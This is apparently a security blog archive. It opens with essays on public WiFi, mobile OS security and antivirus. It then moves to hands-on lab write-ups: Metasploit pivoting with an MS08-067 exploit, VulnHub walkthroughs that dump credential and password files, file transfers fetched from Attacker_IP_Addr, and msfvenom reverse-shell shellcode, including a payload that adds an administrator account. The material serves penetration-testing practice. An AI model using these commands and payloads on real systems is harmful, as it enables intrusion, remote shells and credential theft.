Protecting Your Data

Time and time again, you hear the same advice, use a strong password, never reuse passwords, don't click on hyperlinks or suspicious attachments, install Anti Virus software, keep your software updated, don't post personal data publicly, yada, yada, yada. Most people don't give much thought when connecting to public Wifi hotspots. Almost everywhere we travel, the first thing we look for is a good WiFi with Free Internet! We logon to our social media accounts, even do online banking, buy stuff online, etc. Behind that 'Free WiFi' might be a hotspot designed to steal your credentials or reroute your connections to a fake web server. It sounds ludicrous, but in reality, such devices do exist and is actively deployed in public places. Why? Well, there are various reasons to doing it. People must understand that their personal data is very valuable for legitimate as well as illegitimate purposes. On the dark side, it can be used to steal identities to create fraudulent transactions or even post personal and slanderous remarks using your credentials. In some countries, this can get you in trouble with the law, it's called defamation. It can also be used to track online habits, track your location. Personal data can be stolen either by hijacking it during transmission or when it's at rest. While data at rest are usually stolen from compromised hosts. Both scenarios can be avoided by employing strong encryption and safe online habits.

Data Transmission
But why should I bother if I'm connecting a SSL enabled website? Well, you should be cautious because SSL enabled websites can be stripped/downgraded to plaintext using a technique called sslstriping.  To make it difficult for malicious actors to hijack your data during transmission is to keep your data stream encrypted. VPN offers one solution to the problem but is not a total solution. A VPN connection will make it harder for threat actors to hijack your connections even at the LAN layer. TCP hijacks or MiTM attacks are easier to initiate from the LAN because there are fundamental protocol flaws at the switching layer eg. arp spoofing. Also, it is easier to identify your intended target because the victims are usually physically in closer proximity during this phase of attack. Finally, it is trivial to plant malicious devices in the LAN, such as placing a tap just before the Internet gateway or rerouting packets.

                                                   Attack scenario 1

In Attack scenario 1, the attacker host uses arp spoofing tool to poison the WIFI AP into redirecting Victim's traffic to himself. Thus, allowing attacker to manipulate legitimate traffic, a precursor to further phishing conduit or even sslstrip attacks.

                                                Attack scenario 2

Attack scenario 2, the WIFI AP is jammed and a rogue WIFI AP with the same SSID is setup to lure victim host into connecting to it. Upon successful handshake, all legitimate traffic is rerouted via the rogue AP for further manipulation such as sslstrip, phishing, stealing credential, etc.

Having a dedicated VPN connection to encapsulate your connections will fundamentally make it almost impossible for a threat actor to hijack its data stream because any modification to its data stream will either render its payload useless due to encryption cipher or messes its packet header integrity thus disconnecting itself from further attacks.

Data at Rest
To steal data, it must be readable for it to be valuable. If the content is encrypted it will be of little use to the threat actors. Encrypting data at rest with strong encryption such as AES with asymmetric RSA keys grants recipients privacy by the virtue that only the authorised recipients' can decrypt its data provided he/she has the right public and private key pairs with valid pass phrase. 

Conclusion
Next time you intend to transmit or store anything on any public networks or servers, have a thought on privacy. Always think of who are the rightful recipients. Not everyone should have the same privilege to access your data. After all, it's called private for a reason because such info is unique to you and only you! Eg Credit Card No, SSN, Passport No, Birth dates, Tel no, Bank Account No, userid/passwords, pincodes, passphrase, your mother's maiden name, personal addresses, etc. During transmission of data, remember to check the URI address carefully and its SSL certificate on the server. This can be done by clicking on your browsers' lock sign in the URL bar. Never accept connections with bad SSL cert. Lastly, keep your OS fully patched and never click on links that you are unsure or appears dubious or come from unknown sources.

    

Mobile Phone Security: Apple vs Android

There are more people glued to their mobile phones these days. They are shifting away from the PC to the Mobile platform. Simple matter of convenience than tugging a 13" laptop on a sardined packed commuter.

When we talk about mobile phones, we generally have 2 major flavours; Android by Google and iOS by Apple. Many people argue that iOS is way more secure than Android, why is that? Well, for a start, I only allow my kids to use iOS devices. Mainly because the only way to install apps on it is via the AppStore. Apple has been pretty strict with this policy and I believe this is the main reason why it's more secure. Android on the other hand allow users to download from unknown sources such as standalone APK files that can be downloaded from anywhere. The same can be done on an iOS if it is jailbroken, but that requires some level of work that most average people will not undertake unless he has a good reason to do so. Further more, jailbreaks for iOS are getting scarce as hackers are inclined to sell their wares than make it public. 

From an OS architecture, I feel that there are both fairly secure.  Both OS are built around multilayered Sandboxes that controls system interactions between the Kernel and Apps. While Apple keeps its iOS source code private and Android is Open Source. The former relies on security thru obscurity. There have been many bug bounties offered by both Google and Apple, some offering over USD200k in cash for anyone that can produce a working remote exploit. In the open market, an iOS exploit can go up to USD1.5Million. The bounty is higher for iOS because Apple is known to be more 'secure' than Android. Even President Trump has switched from Android to Apple phone. Both Google and Apple have strict security screening for all apps that appear in their online stores, Google uses Bouncer to scan apps for malicious code but lately we have heard instances of Android apps infected by malware. 

Another reason Apple is referred as a more secure device is due to its patch management life cycle. iOS has only one variant used on all Apple phones, there are no 'modified by manufacturer' or cloned iOS variants. This makes it easier when it comes to pushing out updates to millions of users because there is only 1 iOS image to push to users. Android on the other hand, have more than a dozen of different mods, with each phone manufacturer free to add customisations to suit different phone models. It proves difficult when some manufacturers don't respond promptly when there is a major flaw discovered as each Android patch needs to be tailored to its phone model, or perhaps, they don't take security seriously. Some phones become obsolete before the patch comes out. This leaves millions of Android users vulnerable to hacking. The last major flaw for Android was in its media processing function in ver 5.0, also known as Stagefright.

Apple signs each iOS package for a limited time. That means, once you upgrade iOS, you can't downgrade if the previous iOS package has expired. This is to prevent users from reverting its security as newer iOS packages generally come with improved security. Android on the other hand, allows you to root its device(if the bootloader is not locked) by flashing it with custom Android images. While this is a good way to mod the phone for specialised purposes, it introduces a security risk as modified images can introduce new bugs that can be exploited. Rooting the phone also grants the user with full privileges to its kernel, thus, bypassing default security mechanisms to prevent further hacking.

In a nutshell, it is clear which OS is more secure but it is up to the end user to decide which platform suits him, perhaps budget constraint or flexibility is a major deciding factor. Holistically, security lies with end user awareness. By simply clicking on a hyperlink can introduce malicious code that can take control of your phone remotely. Though, it is way more difficult to exploit an Apple phone than an Android phone, it is not entirely impossible.

Getting Around Multihome Hosts: Part I

So you successfully compromised your first host and it happened to be a dualhomed host, the next logical objective would be to move deeper into the network, this means reaching another host hiding behind a separate network, here is a depiction of my situation:

<attacker host> -------------<host A> -------------------------<host B>
ip: 192.168.0.182         eth0: 192.168.0.191                    192.168.52.134
                                     eth1: 192.168.52.135

Basically, there are several methods of pivoting around the multihomed 'host A':

1. Using meterpreter autoroute & portfwd (win/lin)
2. Using sshd port forwarding & dynamic SOCKS (Win/lin)
3. Using plink port forwarding & dynamic SOCKS (win)

While there are many write ups on the web, I will summarize my experiences for each situation and its advantages and disadvantages. For the first option, you will need a working meterpreter session on host A.

For simplicity, we will assume that we already have a meterpreter session on host A, we setup a multi handler listener to catch the shell:

Performed on Attacker Host:

msf > use exploit/multi/handler 
msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > show options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.0.182    yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > run

[*] Started reverse TCP handler on 192.168.0.182:4444 
[*] Starting the payload handler...
[*] Sending stage (797784 bytes) to 192.168.0.191
[*] Meterpreter session 1 opened (192.168.0.182:4444 -> 192.168.0.191:36774) at 2017-06-17 19:12:39 +0800 

meterpreter > 

Example autoroute:

meterpreter > ifconfig

Interface  1
============
Name         : lo
Hardware MAC : 00:00:00:00:00:00
MTU          : 65536
Flags        : UP,LOOPBACK
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff::


Interface  2
============
Name         : eth0
Hardware MAC : 00:0c:29:2f:f8:cb
MTU          : 1500
Flags        : UP,BROADCAST,MULTICAST
IPv4 Address : 192.168.0.191
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::20c:29ff:fe2f:f8cb
IPv6 Netmask : ffff:ffff:ffff:ffff::


Interface  3
============
Name         : eth1
Hardware MAC : 00:0c:29:2f:f8:d5
MTU          : 1500
Flags        : UP,BROADCAST,MULTICAST
IPv4 Address : 192.168.52.135
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::20c:29ff:fe2f:f8d5
IPv6 Netmask : ffff:ffff:ffff:ffff::

meterpreter > 
Background session 1? [y/N]

msf exploit(handler) > use post/windows/manage/autoroute
msf post(autoroute) > show options 

Module options (post/windows/manage/autoroute):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CMD      autoadd          yes       Specify the autoroute command (Accepted: add, autoadd, print, delete, default)
   NETMASK  255.255.255.0    no        Netmask (IPv4 as "255.255.255.0" or CIDR as "/24"
   SESSION                   yes       The session to run this module on.
   SUBNET                    no        Subnet (IPv4, for example, 10.10.10.0)

msf post(autoroute) > set session 1
session => 1
msf post(autoroute) > run

[*] Running module against hostA.localdomain
[*] Searching for subnets to autoroute.
[+] Route added to subnet 192.168.0.0/255.255.255.0 from host's routing table.
[+] Route added to subnet 192.168.52.0/255.255.255.0 from host's routing table.
[*] Post module execution completed

msf post(autoroute) > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > set rhosts 192.168.52.134
rhosts => 192.168.52.134
msf auxiliary(tcp) > show options 

Module options (auxiliary/scanner/portscan/tcp):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  10               yes       The number of concurrent ports to check per host
   DELAY        0                yes       The delay between connections, per thread, in milliseconds
   JITTER       0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
   PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS       192.168.52.134   yes       The target address range or CIDR identifier
   THREADS      1                yes       The number of concurrent threads
   TIMEOUT      1000             yes       The socket connect timeout in milliseconds

msf auxiliary(tcp) > run

[*] 192.168.52.134:       - 192.168.52.134:139 - TCP OPEN
[*] 192.168.52.134:       - 192.168.52.134:135 - TCP OPEN
[*] 192.168.52.134:       - 192.168.52.134:445 - TCP OPEN

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(tcp) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >

With autoroute, you are limited with a TCP portscan and it has to be done from within metasploit. Upon identifying the open ports using autoroute, switch to portfwd. With portfwd you can do a nmap -A (Application identification) to fingerprint the OS type for further attack.

Example portfwd:

These steps are very important as it maps the local & remote ports to host B, 

the -r statement routes traffic to Host B:  

meterpreter > portfwd add -l 445 -p 445 -r 192.168.52.134
[*] Local TCP relay created: :445 <-> 192.168.52.134:445
meterpreter > portfwd add -l 4444 -p 4444 -r 192.168.52.134
[*] Local TCP relay created: :4444 <-> 192.168.52.134:4444
meterpreter > portfwd list

Active Port Forwards
====================

   Index  Local         Remote               Direction
   -----  -----         ------               ---------
   1      0.0.0.0:445   192.168.52.134:445   Forward
   2      0.0.0.0:4444  192.168.52.134:4444  Forward

2 total active port forwards.

meterpreter > 
Background session 1? [y/N]  y

We put the meterpreter session 1  on host A in the background for the meanwhile. In another 

terminal, take a look at netstat output:

# netstat -an | more
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State      
tcp        0      0 127.0.0.1:5432          0.0.0.0:*               LISTEN     
tcp        0      0 0.0.0.0:4444            0.0.0.0:*               LISTEN     
tcp        0      0 0.0.0.0:445             0.0.0.0:*               LISTEN     
 

Notice the port 4444 and 445 are listening on localhost? This means both these services are available

on our Host A. Therefore we need to set our remote targets to 127.0.0.1(localhost) because 

it will be routed to host B.

But before we can choose an exploit for host B, lets identify it using nmap, since we know

that host A has 445 open, lets use it:

# nmap -p 445 -A 127.0.0.1

Starting Nmap 7.40 ( https://nmap.org ) at 2017-06-17 19:42 SGT
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00011s latency).
PORT    STATE SERVICE      VERSION
445/tcp open  microsoft-ds Windows XP microsoft-ds
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.8 - 4.6
Network Distance: 0 hops
Service Info: OS: Windows XP; CPE: cpe:/o:microsoft:windows_xp

Host script results:
|_clock-skew: mean: 15h29m28s, deviation: 0s, median: 15h29m28s
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: tt-af6d434411ff
|   NetBIOS computer name: TT-AF6D434411FF
|   Workgroup: WORKGROUP
|_  System time: 2017-06-17T20:12:26-07:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server doesn't support SMBv2 protocol

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.83 seconds 

Great! So we know it is a Windows XP box! Let's use the ms08_067_netapi exploit, remember that

our rhost for both the exploit and payload is now 127.0.0.1: 

msf exploit(handler) > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set rhost 127.0.0.1
rhost => 127.0.0.1

msf exploit(ms08_067_netapi) > show options 

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    127.0.0.1        yes       The target address
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST     127.0.0.1        no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf exploit(ms08_067_netapi) > run

[*] Started bind handler
[*] Sending stage (957487 bytes) to 127.0.0.1
[*] 127.0.0.1:445 - Automatically detecting the target...
[*] 127.0.0.1:445 - Fingerprint: Windows XP - Service Pack 3 - lang:Unknown
[*] 127.0.0.1:445 - We could not detect the language pack, defaulting to English
[*] 127.0.0.1:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 127.0.0.1:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 2 opened (127.0.0.1:40699 -> 127.0.0.1:4444) at 2017-06-17 19:18:18 +0800

meterpreter > shell
Process 484 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

There you go! You now have a meterpreter session on host B. It is important to note the different usage of autoroute and portfwd with meterpreter, each designed for different scenarios.




If you don't have the luxury of using meterpreter, you may opt for the 2nd or 3rd option. I'll cover that topic in my next posting.

VulnHub: Sedna Walkthru

Sedna is a rather straight forward VM. I found it a great way to practice and sharpen pentesting skills. I found it similar to some of the hosts in the PWK lab sessions. So if you are looking for something outside the labs for practice, this box is a good one. It did require a bit of enumeration, the remote exploitation was easier than the local privilege escalation, I'm guessing the author added a little twist for added challenge and of course fun ;-)

Credits to Viper for contributing this fantastic VM. If you are interested, you can d/l it here.

1. Start with a port scan, try to play around with the nmap flags, look out for port knocking, as some hosts will only reveal if you scan it in a certain sequence.


2. Rule of thumb, if you see a web port, enumerate it, because this is where you are most likely to find some good stuff on it. Also, it is easier to enumerate than other services. We all use web for browsing so it is natural. Always go for low hanging fruits.

dirb http://192.168.0.113/ -w -o dirb.txt

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

OUTPUT_FILE: dirb.txt
START_TIME: Wed Jun 14 11:30:51 2017
URL_BASE: http://192.168.0.113/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Stoping on warning messages

-----------------

GENERATED WORDS: 4614

---- Scanning URL: http://192.168.0.113/ ----
==> DIRECTORY: http://192.168.0.113/blocks/
==> DIRECTORY: http://192.168.0.113/files/
+ http://192.168.0.113/index.html (CODE:200|SIZE:101)
==> DIRECTORY: http://192.168.0.113/modules/
+ http://192.168.0.113/robots.txt (CODE:200|SIZE:36)
+ http://192.168.0.113/server-status (CODE:403|SIZE:293)
==> DIRECTORY: http://192.168.0.113/system/
==> DIRECTORY: http://192.168.0.113/themes/ 

<--snip--snip-->

3. Found BuilderEngine at http://192.168.0.113/modules/builder_market/license.txt

4. I found 2 exploits on exploit-db.com, took the easy way and used the msf module :-). You can d/l it here.

msf exploit(42025) > info 

       Name: BuilderEngine Arbitrary File Upload Vulnerability and execution
     Module: exploit/linux/misc/42025
   Platform: PHP
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2016-09-18

Provided by:
  metanubix
  Marco Rivoli

Available targets:
  Id  Name
  --  ----
  0   BuilderEngine 3.5.0

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST      192.168.0.113    yes       The target address
  RPORT      80               yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                yes       The base path to BuilderEngine
  VHOST                       no        HTTP server virtual host

Payload information:
  Avoid: 1 characters

Description:
  This module exploits a vulnerability found in BuilderEngine 3.5.0 
  via elFinder 2.0. The jquery-file-upload plugin can be abused to 
  upload a malicious file, which would result in arbitrary remote code 
  execution under the context of the web server.

References:
  https://www.exploit-db.com/exploits/40390

msf exploit(42025) > run

[*] Started reverse TCP handler on 192.168.0.182:4444 
[+] Our payload is at: OccVNRFDJjYA.php. Calling payload...
[*] Calling payload...
[*] Sending stage (33986 bytes) to 192.168.0.113
[*] Meterpreter session 1 opened (192.168.0.182:4444 -> 192.168.0.113:51443) at 2017-06-14 12:14:42 +0800
[+] Deleted OccVNRFDJjYA.php
id

meterpreter > shell
Process 12629 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)  

$ python -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@Sedna:/tmp$ 
 

5. Now for the privilege escalation part, I've been trying various overflayfs exploits

but none seem to work because the /bin/su was removed. After some gooling for ubuntu 14.04

local priv exploits, I found the apport package to be vulnerable. You can d/l it here.

HackLAB: VulnVoIP Walkthru

I found this vulnhub challenge rather unique, mainly because it is a VoIP box waiting to be 0wned. You don't see many of these around, so I got down and dirty with the fun stuff :-)

My approach is slightly different than the other walkthrus as I did not use the SIPVicious toolset. Instead, I owned the box pretty fast after discovering it's vulnerable to a RCE condition. The exploit worked with very little modification to its original code.

In case anyone interested, you can download VulnVoIP VM here.

1. Nmap output: 

2.Browse to http://192.168.0.168/recordings/index.php indicates FreePBX ver 2.5. 

 
3. Download FreePBX exploit. 

4(a). Setup netcat listener to catch the shell:
 

# nc -nlvp 443
listening on [any] 443 ...

4(b). Modify the sploit for http instead of https, configure the rhost and lhost then execute it:

5. Catch the shell and spawn a proper TTY using python: 
listening on [any] 443 ...
connect to [192.168.0.182] from (UNKNOWN) [192.168.0.168] 50752
id
uid=0(root) gid=0(root)
python -c 'import pty;pty.spawn("/bin/bash")'
bash-3.2# id
id
uid=0(root) gid=0(root)
bash-3.2# 

6. Get the asterisk password using the spawned shell:

bash-3.2# cat /etc/asterisk/manager.conf
cat /etc/asterisk/manager.conf
;
; AMI - Asterisk Manager interface
;
; FreePBX needs this to be enabled. Note that if you enable it on a different IP, you need
; to assure that this can't be reached from un-authorized hosts with the ACL settings (permit/deny).
; Also, remember to configure non-default port or IP-addresses in amportal.conf.
; 
; The AMI connection is used both by the portal and the operator's panel in FreePBX.
;
; FreePBX assumes an AMI connection to localhost:5038 by default.
;
[general]
enabled = yes
port = 5038
bindaddr = 0.0.0.0

[admin]
secret = amp111
deny=
permit=0.0.0.0/0.0.0.0
read = system,call,log,verbose,command,agent,user,config,command,dtmf,reporting,cdr,dialplan,originate
write = system,call,log,verbose,command,agent,user,config,command,dtmf,reporting,cdr,dialplan,originate

#include manager_additional.conf
#include manager_custom.conf 
<--snip---snip-->

7. Login to the asterisk CLI using 'admin' with pass 'amp111': 

# telnet 192.168.0.168 5038
Trying 192.168.0.168...
Connected to 192.168.0.168.
Escape character is '^]'.
Asterisk Call Manager/1.1
ACTION: LOGIN
USERNAME: admin
SECRET: amp111
EVENTS: ON

Response: Success
Message: Authentication accepted
 
8. Enumerate the SIPs:

action: command
command: sip show users

Response: Follows
Privilege: Command
Username                   Secret           Accountcode      Def.Context      ACL  NAT       
100                                                          from-internal    Yes  Always    
101                        s3cur3                            from-internal    Yes  Always    
102                        letmein123                        from-internal    Yes  Always    
201                        secret123                         from-internal    Yes  Always    
200                        quit3s3curE123                    from-internal    Yes  Always    
2000                       password123                       from-internal    Yes  Always    
--END COMMAND--

9. Look for Voice mail:

action: VoicemailUsersList 

Response: Success
Message: Voicemail user list will follow

Event: VoicemailUserEntry
VMContext: default
VoiceMailbox: 2000
Fullname: Support
Email: 
Pager: 
ServerEmail: 
MailCommand: 
Language: 
TimeZone: 
Callback: 
Dialout: 
UniqueID: 
ExitContext: 
SayDurationMinimum: 2
SayEnvelope: No
SayCID: No
AttachMessage: No
AttachmentFormat: 
DeleteMessage: No
VolumeGain: 0.00
CanReview: Yes
CallOperator: Yes
MaxMessageCount: 100
MaxMessageLength: 0
NewMessageCount: 1

Event: VoicemailUserEntryComplete

10(a). Using any VoIP client, configure it for SIP: 2000@192.168.0.168 pass: password123 
10(b). Place a call to SIP 2000 and listen for voicemail! ;-) It's engaged! Of course because
I'm dialing my own no. Now, figure out how to retrieve my own voicemailbox.
11. A little googling about 'asterisk voicemail retrieval number', I found that it can be accessed by pressing *98. 
Later I found that you can actually press * too.

12. Voicemail box requires a password!!! Using the existing shell, I did a search in /etc/asterisk/voicemail.conf for it:

bash-3.2# pwd
pwd
/etc/asterisk
bash-3.2# ls voicemail*
ls voicemail*
voicemail.conf voicemail.conf.template
bash-3.2# cat voicemail.conf
cat voicemail.conf
[general]
#include vm_general.inc
#include vm_email.inc
[default]

2000 => 0000,Support,,,attach=no|saycid=no|envelope=no|delete=no
bash-3.2# 

13. Listen to voicemail to retrieve password 'securesupport123'! 
14. Mission accomplished, root dance! :-)

Are AntiVirus Software Really Necessary?

Lately, there's been talk about how AV software are becoming redundant or obsolete. Most of us accustomed with the World Wide Web will know that the Internet is a Wild Wild West, riddled with exploits especially targeted to Windows users. The proliferation of malware, ransomware, trojans contributes to sleepless nights. Then came Windows Defender; Microsoft's build in threat protection center for modern day Windows Operating System. It offers AV protection with cloud definition updates, automatic sampling submission and real time threat protection. So why do we need AVs anymore?

Well, for starters, there are dozens of AV companies, each has its own distinct virus pattern definitions. Therefore, just because Windows Defender is able to detect a malware, doesn't mean the other AVs out there can't or can. Having multiple layers of protection from different perspective is advantageous, as it offers a more comprehensive solution. As malware changes its pattern, the definition update of each AV company will have to adapt.

This doesn't mean you have to install 5 different AVs on your machine, it just means that you have more choices when selecting an appropriate AV software for your environment. If all AV companies went out of business, we'll have to rely on solely on Windows Defender and the world will be a dangerous place! Imagine that, and if MS failed to detect it, who will?!

So peeps, don't give up with using AV software, a little piece of mind goes a long way. Always practice safe browsing habits. Don't click on unknown links, especially shorten links that you can't clearly distinct its origin. Most people do not comprehend the danger in clicking on unknown links. The danger lies in the code that get executed after the click, if the user is running as a high privilege user, the malicious code will inherit the same privilege. Also, if the host software has a vulnerability, the malicious code can take advantage of it to run arbitrary commands, such elevating its privilege to admin or root, shutting down personal firewalls, embedding malicious malware, etc.

It is worthy to note that cyber attacks are now targeting the client instead of the servers. Back in the days, most information were stored on servers and data transfered to clients upon request but with the proliferation of cloud computing, data now resides everywhere, lots of it cached on the client machine! Most major cloud servers have default security mechanisms that make it difficult to breach, leaving the weakest link still in the human factor. It is way easier to trick a user into clicking a malicious link than hacking amazon or google cloud servers.

So, if you ask me, AVs are still important but is by no means the end of all solutions to the problem. As AV softwares continue to evolve and offer threat analysis and protection, user education is still vital in ensuring data stays secure and AV software is like a babysiter, warning users of risky behaviour.

Remember, security is everyone's responsibility.

File Transfer Between Hosts

Here are some useful commands for file transfer between linux hosts:

On Attacker host:
# python -m SimpleHTTPServer 8080

On Victim host:
# wget http://Attacker_IP_Addr:8080/Filename.php 

Another great way to transfer file between hosts is to use netcat: 

On Attacker host: 
# nc -nlvp 8080 < filename.php 

On Victim host: 

# nc -w 3 Attacker_IP_Addr 8080 > filename.php 

For file transfer between windows host, you can use the meterpreter function, but that means you will need to upload the meterpreter shell onto the victim host. Other alternatives, use the python SimpleHTTPServer function  on the attacker host and then simply use IE to download the file via http, that's provided you have RDP on the victim. 

Unfortunately, I'm not aware of any built in command line tool in Windows to transfer files except ftp or tftp or writing your own powershell or vbscript.

Generating Meterpreter Payload with Msfvenom

Generate Windows reverse shell to local host 192.168.0.182  on 443 omit bad chars - x00, x0a, x0d, output using python code syntax:

# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.182 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d" -f python

Generate linux reverse shell on localhost 192.168.0.182 port 443 without badchars x00, x0a, x0d, outut using python code syntax:

# msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.0.182 LPORT=443  EXITFUNC=thread -b "\x00\x0a\x0d" -f python

Output:

No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 10 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 381 (iteration=0)
x86/shikata_ga_nai chosen with final size 381
Payload size: 381 bytes
Final size of python file: 1834 bytes
buf =  ""
buf += "\xba\xf9\x4b\x32\x9e\xda\xd1\xd9\x74\x24\xf4\x5f\x33"
buf += "\xc9\xb1\x59\x31\x57\x14\x03\x57\x14\x83\xc7\x04\x1b"
buf += "\xbe\xce\x76\x59\x41\x2f\x87\x3d\xcb\xca\xb6\x7d\xaf"
buf += "\x9f\xe9\x4d\xbb\xf2\x05\x26\xe9\xe6\x9e\x4a\x26\x08"
buf += "\x16\xe0\x10\x27\xa7\x58\x60\x26\x2b\xa2\xb5\x88\x12"
buf += "\x6d\xc8\xc9\x53\x93\x21\x9b\x0c\xd8\x94\x0c\x38\x94"
buf += "\x24\xa6\x72\x39\x2d\x5b\xc2\x38\x1c\xca\x58\x63\xbe"
buf += "\xec\x8d\x18\xf7\xf6\xd2\x24\x41\x8c\x21\xd3\x50\x44"
buf += "\x78\x1c\xfe\xa9\xb4\xef\xfe\xee\x73\x0f\x75\x07\x80"
buf += "\xb2\x8e\xdc\xfa\x68\x1a\xc7\x5d\xfb\xbc\x23\x5f\x28"
buf += "\x5a\xa7\x53\x85\x28\xef\x77\x18\xfc\x9b\x8c\x91\x03"
buf += "\x4c\x05\xe1\x27\x48\x4d\xb2\x46\xc9\x2b\x15\x76\x09"
buf += "\x94\xca\xd2\x41\x39\x1f\x6f\x08\x56\xec\x42\xb3\xa6"
buf += "\x7a\xd4\xc0\x94\x25\x4e\x4f\x95\xae\x48\x88\xda\x85"
buf += "\x2d\x06\x25\x25\x4e\x0e\xe2\x71\x1e\x38\xc3\xf9\xf5"
buf += "\xb8\xec\x2c\x63\xbc\x7a\x0e\xdc\xbe\xcc\xe6\x1f\xbf"
buf += "\x31\x4d\x96\x59\x61\xe1\xf9\xf5\xc2\x51\xba\xa5\xaa"
buf += "\xbb\x35\x99\xcb\xc4\x9f\xb2\x66\x2a\x76\xea\x1e\xd3"
buf += "\xd3\x60\xbe\x1c\xce\x0c\x80\x96\xfb\xf1\x4f\x5e\x89"
buf += "\xe1\xb8\x3f\x71\xfa\x38\xd5\x71\x90\x3c\x7f\x25\x0c"
buf += "\x3f\xa6\x01\x93\xc0\x8d\x11\xd4\x3f\x53\x20\xae\x76"
buf += "\xc1\x0c\xd8\x76\x05\x8d\x18\x21\x4f\x8d\x70\x95\x2b"
buf += "\xde\x65\xda\xe6\x72\x36\x4f\x08\x23\xea\xd8\x60\xc9"
buf += "\xd5\x2f\x2f\x32\x30\x2c\x37\xcc\xc6\x11\x9f\xa5\x38"
buf += "\x16\x1f\x36\x53\x96\x4f\x5e\xa8\xb9\x60\xae\x51\x10"
buf += "\x29\xa6\xd8\xf5\x98\x57\xdc\xdf\x7c\xc6\xdd\xec\xa4"
buf += "\x1f\x50\x12\x5b\x20\x92\x2f\x8a\x19\xe0\x68\x0f\x1e"
buf += "\xeb\x6a\xa5\x6b\x84\x32\x2c\xd6\xc9\xc4\x9b\x15\xf4"
buf += "\x46\x29\xe6\x03\x56\x58\xe3\x48\xd0\xb1\x99\xc1\xb5"
buf += "\xb5\x0e\xe1\x9f"

Based on my experience, the reverse tcp shell is not very reliable, it could be due to a bad connection or firewall blocking, or some mysterious reason for not allowing the connection to establish. If this happens to you, I recommend to generate windows/exec payload. Example:

# msfvenom -a x86 --platform Windows -p windows/exec CMD='net user administrator qwerty /add' -f python

No encoder or badchars specified, outputting raw payload
Payload size: 219 bytes
Final size of python file: 1056 bytes
buf =  ""
buf += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
buf += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
buf += "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
buf += "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
buf += "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
buf += "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
buf += "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
buf += "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
buf += "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
